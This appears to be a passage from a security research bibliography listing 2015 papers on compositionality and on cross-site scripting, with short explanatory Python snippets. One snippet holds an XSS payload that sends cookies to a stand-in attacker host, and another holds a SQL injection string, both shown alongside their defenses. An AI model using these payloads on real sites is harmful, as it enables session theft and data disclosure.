Abstract: Compositionality is a property of natural language which is of prime importance: It enables humans to form and conceptualize potentially novel and complex ideas, by combining words. On the other hand, the symbol grounding problem examines the way meaning is anchored to entities external to language, such as sensory percepts and sensory-motor routines. In this paper we aim towards the exploration of the intersection of compositionality and symbol grounding. We thus propose a methodology for constructing empirically derived models of grounded meaning, which afford composition of grounded semantics. We illustrate our methodology for the case of adjectival modifiers. Grounded models of adjectively modified and unmodified colors are acquired through a specially designed procedure with 134 participants, and then computational models of the modifiers “dark” and “light” are derived. The generalization ability of these learnt models is quantitatively evaluated, and their usage is demonstrated in a real-world physical humanoid robot. We regard this as an important step towards extending empirical approaches for symbol grounding so that they can accommodate compositionality: a necessary step towards the deep understanding of natural language for situated embodied agents, such as sensor-enabled ambient intelligence and interactive robots.
Keywords: ambient intelligence; human-robot interaction; humanoid robots; natural language processing; adjectival modifiers; compositionality; grounded model acquisition; learnt models; natural language; physical interactive robot; real-world physical humanoid robot; semantic composition; sensor-enabled ambient intelligence; sensory percepts; sensory-motor routines; situated embodied agents; symbol grounding problem; Color; Computational modeling; Grounding; Image color analysis; Robot sensing systems; Semantics; adjectival modifiers; interactive robots; symbol grounding (ID#: 16-9540)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7251463&isnumber=7251419

 

A. McIver; C. Morgan; T. Rabehaja, “Abstract Hidden Markov Models: A Monadic Account of Quantitative Information Flow,” Logic in Computer Science (LICS), Proceedings of the 2015 30th Annual ACM/IEEE Symposium on, Kyoto, 2015, vol., no., pp. 597–608. doi:10.1109/LICS.2015.61
Abstract: Hidden Markov Models, HMM’s, are mathematical models of Markov processes whose state is hidden but from which information can leak via channels. They are typically represented as 3-way joint probability distributions. We use HMM’s as denotations of probabilistic hidden-state sequential programs, after recasting them as “abstract” HMM’s, i.e. computations in the Giry monad D, and equipping them with a partial order of increasing security. However to encode the monadic type with hiding over state X we use DX→D2X rather than the conventional X→DX. We illustrate this construction with a very small Haskell prototype. We then present uncertainty measures as a generalisation of the extant diversity of probabilistic entropies, and we propose characteristic analytic properties for them. Based on that, we give a “backwards”, uncertainty-transformer semantics for HMM’s, dual to the “forwards” abstract HMM’s. Finally, we discuss the Dalenius desideratum for statistical databases as an issue in semantic compositionality, and propose a means for taking it into account.
Keywords: entropy; functional languages; functional programming; hidden Markov models; programming language semantics; statistical databases; statistical distributions; 3-way joint probability distribution; Dalenius desideratum; Giry monad; Haskell prototype; Markov process; abstract HMM; abstract hidden Markov models; mathematical model; monadic account; monadic type encoding; probabilistic entropy; probabilistic hidden-state sequential program; quantitative information flow; semantic compositionality; statistical database; uncertainty measure; uncertainty-transformer semantics; Hidden Markov models; Joints; Markov processes; Measurement uncertainty; Probabilistic logic; Semantics; Uncertainty; Abstract hidden Markov models; Giry Monad; Quantitative information flow (ID#: 16-9541)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7174915&isnumber=7174853
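
To make the quantitative-information-flow setting concrete: a hidden state leaks through a probabilistic channel, and an uncertainty measure (here plain Shannon entropy, one instance of the family of entropies the paper generalizes) quantifies the leak. The numeric toy below is our illustration, not the paper’s monadic construction:

    import math

    PRIOR = {"s0": 0.5, "s1": 0.5}            # distribution over hidden state
    CHANNEL = {"s0": {"a": 0.9, "b": 0.1},     # P(observation | state)
               "s1": {"a": 0.2, "b": 0.8}}

    def entropy(dist):
        return -sum(p * math.log2(p) for p in dist.values() if p > 0)

    def posterior(obs):
        # Bayes: what an adversary believes about the state after the leak.
        joint = {s: PRIOR[s] * CHANNEL[s][obs] for s in PRIOR}
        z = sum(joint.values())
        return {s: p / z for s, p in joint.items()}

    p_obs = {o: sum(PRIOR[s] * CHANNEL[s][o] for s in PRIOR) for o in ("a", "b")}
    remaining = sum(p_obs[o] * entropy(posterior(o)) for o in p_obs)
    print("prior uncertainty:", entropy(PRIOR), "bits")           # 1.0 bit
    print("leakage:", round(entropy(PRIOR) - remaining, 3), "bits")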

 

S. Gujrati; H. Zhu; G. Singh, “Composable Algorithms for Interdependent Cyber Physical Systems,” Resilience Week (RWS), 2015, Philadelphia, PA, 2015, vol., no., pp. 1–6. doi:10.1109/RWEEK.2015.7287431
Abstract: Cyber-Physical Systems (CPS) applications are being increasingly used to provide services in domains such as health-care, transportation, and energy. Providing such services may require interactions between applications, some of which may be unpredictable. Understanding and mitigating such interactions require that CPSs be designed as open and composable systems. Composition has been studied extensively in the literature. To complement this work, this paper studies composition of cyber algorithms with user behaviors in a CPS. Traditional middleware algorithms have been designed by abstracting away the underlying system and providing users with high-level APIs to interact with the physical system. In a CPS, however, users may interact directly with the physical system and may perform actions that are part of the services provided. We find that by accounting for user interactions and including them as part of the solution, one can design algorithms that are more efficient, predictable and resilient. To accomplish this, we propose a framework to model both the physical and the cyber systems. This framework allows specification of both physical algorithms and cyber algorithms. We discuss how such specifications can be composed to design middleware that leverages user actions. We show that such composite solutions preserve invariants of the component algorithms such as those related to functional properties and fault-tolerance. Our future work involves developing a comprehensive framework that uses compositionality as a key feature to address interdependent behavior of CPSs.
Keywords: formal specification; human computer interaction; middleware; object-oriented programming; open systems; software fault tolerance; user centred design; CPS applications; CPS interdependent behavior; component algorithm; composable algorithms; composable systems; cyber algorithm; energy domain; fault-tolerance; functional properties; health-care domain; high-level API; interdependent cyber-physical systems; middleware algorithm design; middleware design; physical system interaction; specification composition; transportation domain; user action; user behavior; user interaction; Algorithm design and analysis; Computational modeling; Middleware; Prediction algorithms; Sensors; Vehicles (ID#: 16-9542)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7287431&isnumber=7287407

 

V. Koutsoumpas, “A Model-Based Approach for the Specification of a Virtual Power Plant Operating in Open Context,” Software Engineering for Smart Cyber-Physical Systems (SEsCPS), 2015 IEEE/ACM 1st International Workshop on, Florence, 2015, vol., no., pp. 26–32. doi:10.1109/SEsCPS.2015.13
Abstract: Nowadays, it is widely accepted that the paradigm of closed context systems has altered. As software systems in combination with physical systems, termed Cyber Physical Systems (CPSs), evolve into more and more complex structures to meet the continuously increasing complexity of requirements, they are faced with a variety of challenges. Those systems have to operate in an open context, meaning that the system boundary between the system and the environment changes over time. Furthermore, the operating system has to adapt its behavior to the observed environmental changes. Hence, there is a great need for the establishment of a seamless modeling framework which fosters the modeling of systems operating in open context. In this paper: 1) we explore how a modeling theory based on fuzzy logic allows for a formal specification of such systems; 2) we embed the modeling theory in the SPES development method established within the German research project SPES, showing the compositionality of our approach; 3) we illustrate with a show case how the approach can be applied, by way of example, to modeling the behavior of a Virtual Power Plant (VPP).
Keywords: formal specification; fuzzy logic; operating systems (computers); power engineering computing; power plants; CPSs; SPES German research project; SPES development method; cyber physical systems; model-based approach; modeling theory; operating system; software systems; virtual power plant specification; Context; Context modeling; Fuzzy logic; Syntactics; Uncertainty; Unified modeling language (ID#: 16-9543)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7173940&isnumber=7173927

 

S. Calzavara; A. Rabitti; M. Bugliesi, “Compositional Typed Analysis of ARBAC Policies,” Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, Verona, 2015, vol., no., pp. 33–45. doi:10.1109/CSF.2015.10
Abstract: Model-checking is a popular approach to the security analysis of ARBAC policies, but its effectiveness is hindered by the exponential explosion of the ways in which different users can be assigned to different role combinations. In this paper we propose a paradigm shift, based on the observation that, while verifying ARBAC by exhaustive state search is complex, realistic policies often have rather simple security proofs, and we propose to use types as an effective tool to leverage this simplicity. Concretely, we present a static type system to verify the security of ARBAC policies, along with a sound and complete type inference algorithm used to automate the verification process. We then introduce compositionality results, which identify sufficient conditions to preserve the security guarantees obtained by the verification of different sub-policies when these sub-policies are combined together: this compositional reasoning is crucial when policy administration is highly distributed and naturally supports the security analysis of evolving ARBAC policies. We evaluate our approach by implementing TAPA, a static analyser for ARBAC policies based on our theory, which we test on a number of relatively large, publicly available policies from the literature.
Keywords: authorisation; formal specification; formal verification; program diagnostics; reasoning about programs; type theory; ARBAC policy; TAPA; compositional reasoning; compositional typed analysis; exponential explosion; model-checking; paradigm shift; policy administration; realistic policy; security analysis; security guarantee; security proof; state search; static analyser; type inference algorithm; verification process; Access control; Algorithm design and analysis; Labeling; Safety; Semantics; Syntactics (ID#: 16-9544)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7243723&isnumber=7243713
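
For contrast with the typed approach, the exhaustive state search whose exponential explosion the authors sidestep is easy to sketch. The toy role-reachability check below uses hypothetical can-assign/can-revoke rules of our own; it illustrates the underlying problem, not the TAPA analyser:

    from collections import deque

    # Toy ARBAC rules: (administrative role, precondition roles, target role).
    CAN_ASSIGN = [("manager", frozenset({"employee"}), "auditor"),
                  ("manager", frozenset({"auditor"}), "finance")]
    CAN_REVOKE = [("manager", "auditor")]

    def reachable(start: frozenset) -> set:
        """Enumerate every role combination a user can reach
        (exponential in the number of roles, in general)."""
        seen, work = {start}, deque([start])
        while work:
            cur = work.popleft()
            succs = [cur | {t} for _, pre, t in CAN_ASSIGN
                     if pre <= cur and t not in cur]
            succs += [cur - {t} for _, t in CAN_REVOKE if t in cur]
            for nxt in succs:
                if nxt not in seen:
                    seen.add(nxt)
                    work.append(nxt)
        return seen

    states = reachable(frozenset({"employee"}))
    print(len(states), "reachable role sets;",
          "'finance' reachable:", any("finance" in s for s in states))

A type system, by contrast, can certify properties of each sub-policy once and reuse them compositionally, which is what makes distributed policy administration tractable.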
 


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Cross Site Scripting 2015

A type of computer security vulnerability typically found in Web applications, cross-site scripting (XSS) enables attackers to inject client-side script into web pages viewed by other users. Attackers may use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy. Consequences may range from petty nuisance to significant security risk, depending on the value of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site’s owner. Because XSS remains a frequent method of attack, research is being conducted on methods to prevent, detect, and mitigate it. The articles cited here were published in 2015.
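
To make the vulnerability class concrete before the citations, here is a generic illustration (not drawn from any cited paper) of a reflected XSS payload and its neutralization by contextual output encoding, sketched in Python:

    import html

    # Attacker-controlled input, e.g. a query-string parameter.
    user_input = '<script>new Image().src="//evil.example/?c="+document.cookie</script>'

    # Vulnerable: raw interpolation ships the attacker's script to every viewer.
    unsafe_page = "<p>Hello, " + user_input + "</p>"

    # Mitigated: escaping turns markup into inert text before it reaches the page.
    safe_page = "<p>Hello, " + html.escape(user_input) + "</p>"

    print(safe_page)  # the <script> tag is rendered harmless as &lt;script&gt;...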



Gupta, M.K.; Govil, M.C.; Singh, G., “Predicting Cross-Site Scripting (XSS) Security Vulnerabilities In Web Applications,” in Computer Science and Software Engineering (JCSSE), 2015 12th International Joint Conference on, vol., no., pp. 162–167, 22–24 July 2015. doi:10.1109/JCSSE.2015.7219789
Abstract: Recently, machine-learning based vulnerability prediction models are gaining popularity in web security space, as these models provide a simple and efficient way to handle web application security issues. Existing state-of-art Cross-Site Scripting (XSS) vulnerability prediction approaches do not consider the context of the user-input in output-statement, which is very important to identify context-sensitive security vulnerabilities. In this paper, we propose a novel feature extraction algorithm to extract basic and context features from the source code of web applications. Our approach uses these features to build various machine-learning models for predicting context-sensitive Cross-Site Scripting (XSS) security vulnerabilities. Experimental results show that the proposed features based prediction models can discriminate vulnerable code from non-vulnerable code at a very low false rate.
Keywords: Internet; feature extraction; security of data; Web applications; XSS security vulnerability prediction; context-sensitive cross-site scripting; cross-site scripting security vulnerability prediction; feature extraction algorithm; Accuracy; Context; Feature extraction; HTML; Measurement; Predictive models; Security; context-sensitive; cross-site scripting vulnerability; input validation; machine learning; web application security (ID#: 16-9177)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7219789&isnumber=7219755
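
The paper’s feature set and models are not reproduced in the abstract, but the general shape of such a predictor, learning to separate vulnerable output statements from safe ones, can be sketched with scikit-learn. The samples and character-n-gram features below are our own toy stand-ins, not the authors’ algorithm:

    from sklearn.feature_extraction.text import CountVectorizer
    from sklearn.linear_model import LogisticRegression
    from sklearn.pipeline import make_pipeline

    # Label 1 = sink receives unvalidated input; label 0 = encoded or static.
    samples = [
        ('out.println(request.getParameter("q"));', 1),
        ('out.println(Encode.forHtml(request.getParameter("q")));', 0),
        ('out.println("static text");', 0),
        ('response.getWriter().write(userInput);', 1),
    ]
    code, labels = zip(*samples)

    model = make_pipeline(
        CountVectorizer(analyzer="char_wb", ngram_range=(3, 5)),  # crude lexical context
        LogisticRegression(),
    )
    model.fit(code, labels)
    print(model.predict(['out.println(request.getParameter("name"));']))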

 

Sonewar, P.A.; Mhetre, N.A., “A Novel Approach for Detection of SQL Injection and Cross Site Scripting Attacks,” in Pervasive Computing (ICPC), 2015 International Conference on, vol., no., pp. 1–4, 8–10 Jan. 2015. doi:10.1109/PERVASIVE.2015.7087131
Abstract: Web applications provide a vast category of functionalities and usefulness. As more and more sensitive data becomes available over the internet, hackers are becoming more interested in revealing such data, which can cause massive damage. SQL injection is one such attack. This attack can be used to infiltrate the database of any web application, which may lead to alteration of the database or disclosure of important information. Cross site scripting is another attack, in which the attacker obfuscates the input given to the web application, which may lead to changes in the view of the web page. Three-tier web applications can be categorized statically and dynamically for detecting and preventing these types of attacks. A mapping model in which requests are mapped onto queries can be used effectively to detect such attacks, and prevention logic can be applied.
Keywords: Internet; SQL; Web sites; security of data; SQL injection detection; Web applications; Web page; cross site scripting attack; database infiltration; mapping model; prevention logic; Blogs; Computers; Conferences; Databases; Intrusion detection; Uniform resource locators; Cross Site Scripting (XSS); Intrusion Detection System (IDS); SQL injection attack; Tier Web Application; Web Security Vulnerability (ID#: 16-9178)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7087131&isnumber=7086957
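
The abstract does not spell out the mapping model, but the query-rewriting behavior such detectors are built to catch, and the standard parameterized-query defense, are easy to demonstrate. The sqlite3 sketch below is generic, not the authors’ system:

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

    attacker = "alice' OR '1'='1"

    # Vulnerable: string concatenation lets the payload rewrite the query's logic.
    leaked = conn.execute(
        "SELECT secret FROM users WHERE name = '" + attacker + "'").fetchall()
    print("concatenated query returns:", leaked)   # every row comes back

    # Safe: a parameterized query keeps the input as pure data.
    safe = conn.execute(
        "SELECT secret FROM users WHERE name = ?", (attacker,)).fetchall()
    print("parameterized query returns:", safe)    # no rows match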

 

Shanmugasundaram, G.; Ravivarman, S.; Thangavellu, P., “A Study on Removal Techniques of Cross-Site Scripting from Web Applications,” in Computation of Power, Energy Information and Communication (ICCPEIC), 2015 International Conference on, vol., no., pp. 0436–0442, 22–23 April 2015. doi:10.1109/ICCPEIC.2015.7259498
Abstract: Cross site scripting (XSS) vulnerability is among the top 10 web application vulnerabilities based on a 2013 survey by the Open Web Application Security Project [9]. The XSS attack occurs when a web-based application takes input from users through web pages without validating it. An attacker or hacker uses this to insert malicious scripts in web pages through such inputs, so the scripts can perform malicious actions when a client visits the vulnerable web pages. This study concentrates on various security measures for the removal of XSS from web applications (i.e., defensive coding techniques), and the issues of the defensive techniques based on those measures are reported in this paper.
Keywords: Internet; security of data; Web application vulnerability; XSS attack; cross-site scripting; removal technique; Encoding; HTML; Java; Uniform resource locators; cross site scripting; data sanitization; data validation; defensive coding technique; output escaping; scripting languages; vulnerabilities (ID#: 16-9179)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7259498&isnumber=7259434
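The defensive coding techniques this survey reviews hinge on output escaping being matched to the output context. A small stdlib-only illustration of why a single encoder is not enough:

```python
import html
from urllib.parse import quote

user_input = '<script>alert(1)</script>'

# HTML body context: entity-encode so the markup is rendered inert.
print(html.escape(user_input))      # &lt;script&gt;alert(1)&lt;/script&gt;

# URL parameter context: the same payload needs a different encoder.
print("https://example.com/search?q=" + quote(user_input))
```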

 

Panja, B.; Gennarelli, T.; Meharia, P., “Handling Cross Site Scripting Attacks Using Cache Check to Reduce Webpage Rendering Time with Elimination of Sanitization and Filtering in Light Weight Mobile Web Browser,” in Mobile and Secure Services (MOBISECSERV), 2015 First Conference on, vol., no., pp. 1–7, 20–21 Feb. 2015. doi:10.1109/MOBISECSERV.2015.7072878
Abstract: In this paper we propose a new approach to prevent and detect potential cross-site scripting attacks. Our method, called Buffer Based Cache Check, will utilize both the server-side and the client-side to detect and prevent XSS attacks, and will require modification of both in order to function correctly. With Cache Check, instead of the server supplying a complete whitelist of all the known trusted scripts to the mobile browser every time a page is requested, the server will instead store a cache that contains a validated “trusted” instance of the last time the page was rendered, which can be checked against the requested page for inconsistencies. We believe that with our proposed method, rendering times in mobile browsers will be significantly reduced, as part of the checking is done via the server and less checking is done within the mobile browser, which is slower than the server. With our method the entire checking process isn’t dumped onto the mobile browser, and as a result the mobile browser should be able to render pages faster, as it is only checking for “untrusted” content; with other approaches, every single line of code is checked by the mobile browser, which increases rendering times.
Keywords: cache storage; client-server systems; mobile computing; online front-ends; security of data; trusted computing; Web page rendering time; XSS attacks; buffer based cache check; client-side; cross-site scripting attacks; filtering; light weight mobile Web browser; sanitization; server-side; trusted instance; untrusted content; Browsers; Filtering; Mobile communication; Radio access networks; Rendering (computer graphics); Security; Servers; Cross site scripting; cache check; mobile browser; webpage rendering (ID#: 16-9180)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7072878&isnumber=7072857
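A minimal sketch of the cache-check idea described above, assuming the "trusted" instance is represented as a set of hashes of inline scripts from the last validated render; the real system's buffer management and browser-side checks are omitted:

```python
import hashlib, re

def script_fingerprints(page_html):
    """Hash each inline script block so two renders compare cheaply."""
    scripts = re.findall(r"<script[^>]*>(.*?)</script>", page_html, re.S)
    return {hashlib.sha256(s.encode()).hexdigest() for s in scripts}

# Server-side cache: fingerprints of the last validated ("trusted") render.
trusted = script_fingerprints("<script>init();</script><p>hello</p>")

def untrusted_scripts(requested_html):
    """Only scripts absent from the trusted cache need further checking."""
    return script_fingerprints(requested_html) - trusted

print(untrusted_scripts("<script>init();</script><script>steal()</script>"))
```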

 

Pandurang, R.M.; Karia, D.C., “A Mapping-Based Model for Preventing Cross Site Scripting and SQL Injection Attacks on Web Application and its Impact Analysis,” in Next Generation Computing Technologies (NGCT), 2015 1st International Conference on, vol., no., pp. 414–418, 4–5 Sept. 2015. doi:10.1109/NGCT.2015.7375152
Abstract: Web applications provide a vast category of functionalities and usefulness. As more and more sensitive data becomes available over the web, crackers are increasingly attracted to revealing such data, which can cause immense harm. SQL injection is one such type of attack. This attack can be used to infiltrate the back-end of any web application, which may lead to modification of the database or disclosure of significant information. An attacker can obfuscate the input given to the web application using a cross site scripting attack, which may lead to distortion of the web page view. Three-tier web applications can be categorized into static and dynamic web applications for detecting and preventing these types of attacks. A mapping model, in which requests are mapped onto generated queries, can be used productively to detect such attacks, and prevention logic can be applied for attack removal. The impact of the container based approach on the web server is measured using the autobench tool; the parameters used are network throughput and response time.
Keywords: Internet; SQL; query processing; security of data; SQL injection attack prevention logic; Web page view; Web server; attack removal; autobench tool; container based approach; cross site scripting attack prevention logic; database modification; dynamic Web applications; generated queries; impact measurement; mapping-based model; network response time; network throughput; static Web applications; Computers; Containers; Databases; Throughput; Time factors; Web servers; Cross Site Scripting (XSS) Attack; Intrusion Detection System (IDS); Mapping model; SQL Injection Attack (ID#: 16-9181)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7375152&isnumber=7375067

 

Rui Wang; Xiaoqi Jia; Qinlei Li; Daojuan Zhang, “Improved N-gram Approach for Cross-Site Scripting Detection in Online Social Network,” in Science and Information Conference (SAI), 2015, vol., no., pp. 1206–1212, 28–30 July 2015. doi:10.1109/SAI.2015.7237298
Abstract: Nowadays Online Social Networks (OSNs) have become a popular web service in the world. With the development of mobile networks, OSNs provide users with an online communication platform. However, the OSNs’ openness leads to so much exposure that it brings many new security threats, such as cross-site scripting (XSS) attacks. In this paper, we present a novel approach using classifiers and an improved n-gram model to do XSS detection in OSNs. Firstly, we identify a group of features from webpages and use them to generate classifiers for XSS detection. Secondly, we present an improved n-gram model (a model derived from the n-gram model) built from the features to classify webpages. Thirdly, we propose an approach based on the combination of classifiers and the improved n-gram model to detect XSS in OSNs. Finally, a method is proposed to simulate XSS worm spread in OSNs to get more accurate experiment data. Our experiment results demonstrate that our approach is effective in OSN XSS detection.
Keywords: computer crime; pattern classification; social networking (online); OSN openness; Web pages classification; Web service; XSS attacks; XSS detection; XSS worm spread; classifiers; cross-site scripting detection; mobile networks development; n-gram approach; n-gram model; online communication platform; online social network; security threats; Data models; Feature extraction; Grippers; HTML; Libraries; Malware; Social network services; Cross-site Scripting Attacks Detection; N-gram Model; Online Social Networks Security (ID#: 16-9182)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7237298&isnumber=7237120
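As a toy illustration of n-gram based classification (not the paper's improved model or trained classifiers), the sketch below scores a page fragment by the fraction of its character 3-grams that appear in a hypothetical suspicious set learned offline:

```python
def char_ngrams(text, n=3):
    """Character n-grams of a webpage fragment."""
    return [text[i:i + n] for i in range(len(text) - n + 1)]

# Hypothetical n-grams an offline training phase associated with XSS.
SUSPICIOUS = {"<sc", "scr", "rip", "ipt", "ale", "ler", "ert"}

def xss_score(fragment, n=3):
    grams = char_ngrams(fragment.lower(), n)
    if not grams:
        return 0.0
    return sum(g in SUSPICIOUS for g in grams) / len(grams)

print(xss_score("<p>hello world</p>"))                        # 0.0
print(xss_score("<script>alert(document.cookie)</script>"))   # higher score
```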

 

Gupta, M.K.; Govil, M.C.; Singh, G.; Sharma, P., “XSSDM: Towards Detection and Mitigation of Cross-Site Scripting Vulnerabilities in Web Applications,” in Advances in Computing, Communications and Informatics (ICACCI), 2015 International Conference on, vol., no., pp. 2010–2015, 10–13 Aug. 2015. doi:10.1109/ICACCI.2015.7275912
Abstract: With the growth of the Internet, web applications are becoming very popular in the user communities. However, the presence of security vulnerabilities in the source code of these applications is raising the cyber crime rate rapidly. It is required to detect and mitigate these vulnerabilities before their exploitation in the execution environment. Recently, the Open Web Application Security Project (OWASP) and the Common Weakness Enumeration (CWE) reported Cross-Site Scripting (XSS) as one of the most serious vulnerabilities in web applications. Though many vulnerability detection approaches have been proposed in the past, existing detection approaches have limitations in terms of false positive and false negative results. This paper proposes a context-sensitive approach based on static taint analysis and pattern matching techniques to detect and mitigate XSS vulnerabilities in the source code of web applications. The proposed approach has been implemented in a prototype tool and evaluated on a public data set of 9408 samples. Experimental results show that the proposed tool outperforms existing popular open source tools in the detection of XSS vulnerabilities.
Keywords: Internet; computer crime; pattern matching; program diagnostics; source code (software); Internet; Web application; XSSDM; context-sensitive approach; cross-site scripting vulnerability detection; cyber crime; pattern matching technique; security vulnerability; source code; static taint analysis; Context; HTML; Reactive power; Security; Sensitivity; Servers; Standards; Context Sensitive; Cross-site scripting (XSS); Pattern matching; Static Analysis; Web Application Security (ID#: 16-9183)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7275912&isnumber=7275573
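A heavily simplified illustration of static taint analysis of the kind the abstract describes, tracking taint from a $_GET source to an echo sink over a toy PHP-like program; the sanitizer list, grammar, and context handling are placeholders, not XSSDM itself:

```python
import re

# Toy PHP-like program: taint enters via $_GET and must pass a sanitizer
# before reaching an output sink (echo).
PROGRAM = [
    '$name = $_GET["name"];',
    '$safe = htmlspecialchars($name);',
    'echo $safe;',
    'echo $_GET["q"];',            # tainted data reaches a sink -> report
]

def analyze(lines):
    tainted = set()
    for no, line in enumerate(lines, 1):
        m = re.match(r"(\$\w+)\s*=\s*(.*);", line)
        if m:
            var, rhs = m.groups()
            if "$_GET" in rhs or any(v in rhs for v in tainted):
                if "htmlspecialchars" in rhs:   # sanitizer strips the taint
                    tainted.discard(var)
                else:
                    tainted.add(var)
        elif line.startswith("echo"):
            expr = line[len("echo"):]
            if "$_GET" in expr or any(v in expr for v in tainted):
                print(f"line {no}: possible XSS - tainted data reaches echo")

analyze(PROGRAM)
```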

 

Zibordi de Paiva, O.; Ruggiero, W.V., “A Survey on Information Flow Control Mechanisms in Web Applications,” in High Performance Computing & Simulation (HPCS), 2015 International Conference on, vol., no., pp. 211–220, 20–24 July 2015. doi:10.1109/HPCSim.2015.7237042
Abstract: Web applications are nowadays ubiquitous channels that provide access to valuable information. However, web application security remains problematic, with Information Leakage, Cross-Site Scripting and SQL-Injection vulnerabilities — which all present threats to information — standing among the most common ones. On the other hand, Information Flow Control is a mature and well-studied area, providing techniques to ensure the confidentiality and integrity of information. Thus, numerous works were made proposing the use of these techniques to improve web application security. This paper provides a survey on some of these works that propose server-side only mechanisms, which operate in association with standard browsers. It also provides a brief overview of the information flow control techniques themselves. At the end, we draw a comparative scenario between the surveyed works, highlighting the environments for which they were designed and the security guarantees they provide, also suggesting directions in which they may evolve.
Keywords: Internet; SQL; security of data; SQL-injection vulnerability; Web application security; cross-site scripting; information confidentiality; information flow control mechanisms; information integrity; information leakage; server-side only mechanisms; standard browsers; ubiquitous channels; Browsers; Computer architecture; Context; Security; Standards; Web servers; Cross-Site Scripting; Information Flow Control; Information Leakage; SQL Injection; Web Application Security (ID#: 16-9184)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7237042&isnumber=7237005

 

Fazzini, M.; Saxena, P.; Orso, A., “AutoCSP: Automatically Retrofitting CSP to Web Applications,” in Software Engineering (ICSE), 2015 IEEE/ACM 37th IEEE International Conference on, vol. 1, no., pp. 336–346, 16–24 May 2015. doi:10.1109/ICSE.2015.53
Abstract: Web applications often handle sensitive user data, which makes them attractive targets for attacks such as cross-site scripting (XSS). Content security policy (CSP) is a content-restriction mechanism, now supported by all major browsers, that offers thorough protection against XSS. Unfortunately, simply enabling CSP for a web application would affect the application’s behavior and likely disrupt its functionality. To address this issue, we propose AutoCSP, an automated technique for retrofitting CSP to web applications. AutoCSP (1) leverages dynamic taint analysis to identify which content should be allowed to load on the dynamically-generated HTML pages of a web application and (2) automatically modifies the server-side code to generate such pages with the right permissions. Our evaluation, performed on a set of real-world web applications, shows that AutoCSP can retrofit CSP effectively and efficiently.
Keywords: Internet; security of data; AutoCSP policy; CSP content-restriction mechanism; CSP retrofitting; Web applications; XSS protection; content security policy; cross-site scripting; dynamic taint analysis; dynamically-generated HTML pages; server-side code modification; Algorithm design and analysis; Browsers; HTML; Heuristic algorithms; Security; Servers; Web pages; Content security policy (ID#: 16-9185)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7194586&isnumber=7194545
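To make the retrofit idea concrete, here is a hedged sketch of deriving a script-src directive from the script sources a trusted run of a page is observed to load; AutoCSP's dynamic taint analysis and server-side code rewriting go far beyond this toy:

```python
from urllib.parse import urlparse

def build_csp(observed_script_urls, allow_inline=False):
    """Derive a script-src directive from the sources a page legitimately
    loads (e.g., as recorded during trusted runs)."""
    origins = {"'self'"}
    for url in observed_script_urls:
        p = urlparse(url)
        if p.scheme and p.netloc:
            origins.add(f"{p.scheme}://{p.netloc}")
    if allow_inline:
        origins.add("'unsafe-inline'")   # defeats much of CSP's XSS protection
    return "script-src " + " ".join(sorted(origins))

header = build_csp([
    "https://cdn.example.com/app.js",
    "/static/local.js",                  # relative -> covered by 'self'
])
print("Content-Security-Policy:", header)
```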

 

Hazel, J.J.; Valarmathie, P.; Saravanan, R., “Guarding Web Application with Multi-Angled Attack Detection,” in Soft-Computing and Networks Security (ICSNS), 2015 International Conference on, vol., no., pp. 1–4, 25–27 Feb. 2015. doi:10.1109/ICSNS.2015.7292382
Abstract: An important research issue in the design of web applications is protecting the front end web application from unauthorized access. Normally the web application is in the front end and the database is in the back end, and it can be accessed using a web browser. The database contains valuable information and is the target for attackers. There are many security issues in the back end database, and many security measures have been implemented in order to protect it. The problem here is that the front end application is accessible by everyone, and attackers try to compromise the web front end application, which in turn compromises the back end database. Therefore, the challenge here is to provide security to the front end web application, thus enhancing security for the back end database. Currently a vulnerability scanner is used to provide security to the front end web application. Even though many attacks are possible, the most common and topmost attacks are remote file inclusion attacks, query string attacks, union attacks, and cross site scripting attacks. The proposed system is based on a design of the web application that concentrates mainly on the detection and prevention of the above attacks. Initially, the system will show how these attacks happen in the front end web application, and then how they are overcome using the proposed algorithms, namely the longest common subsequence algorithm and the brute force string matching algorithm. Successfully overcoming these attacks enhances security in the back end by implementing security in the web front end.
Keywords: Internet; authorisation; database management systems; online front-ends; query processing; Web application; Web browser; Web front end application; back end database; cross site scripting attack; multi-angled attack detection; query string attack; remote file inclusion attack; security issues; security measures; unauthorized access; union attack; Algorithm design and analysis; Browsers; Communication networks; Databases; Force; Reliability; Security; Cross site scripting attack; Query string attack; Remote file inclusion attack; Union attack (ID#: 16-9186)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7292382&isnumber=7292366
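The abstract names the longest common subsequence algorithm as one of its detection building blocks. A small self-contained sketch of LCS-based signature matching, with hypothetical signatures and threshold:

```python
def lcs_length(a, b):
    """Classic dynamic-programming longest common subsequence length."""
    dp = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i, ca in enumerate(a, 1):
        for j, cb in enumerate(b, 1):
            dp[i][j] = dp[i-1][j-1] + 1 if ca == cb else max(dp[i-1][j], dp[i][j-1])
    return dp[len(a)][len(b)]

# Hypothetical signatures for three of the attack classes named above.
SIGNATURES = {
    "xss": "<script>",
    "union": "union select",
    "rfi": "http://",          # remote file inclusion via a URL parameter
}

def matches(user_input, threshold=0.8):
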